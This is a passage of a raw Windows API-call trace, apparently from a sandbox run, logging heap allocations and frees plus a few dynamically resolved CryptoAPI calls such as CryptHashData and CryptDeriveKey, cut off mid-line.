RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0139.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0139.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0139.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0139.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0139.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0139.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0139.757] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0139.758] CryptHashData (hHash=0xa86f90, pbData=0x2e54ea8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0139.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0139.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0139.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0139.761] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0139.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0139.762] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0139.762] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0139.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0139.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0139.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0139.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0139.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0139.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0139.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0139.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0139.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0139.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0139.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0139.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0139.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0139.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0139.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0139.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0139.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0139.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0139.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50a58 [0139.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50a58, cbMultiByte=15, 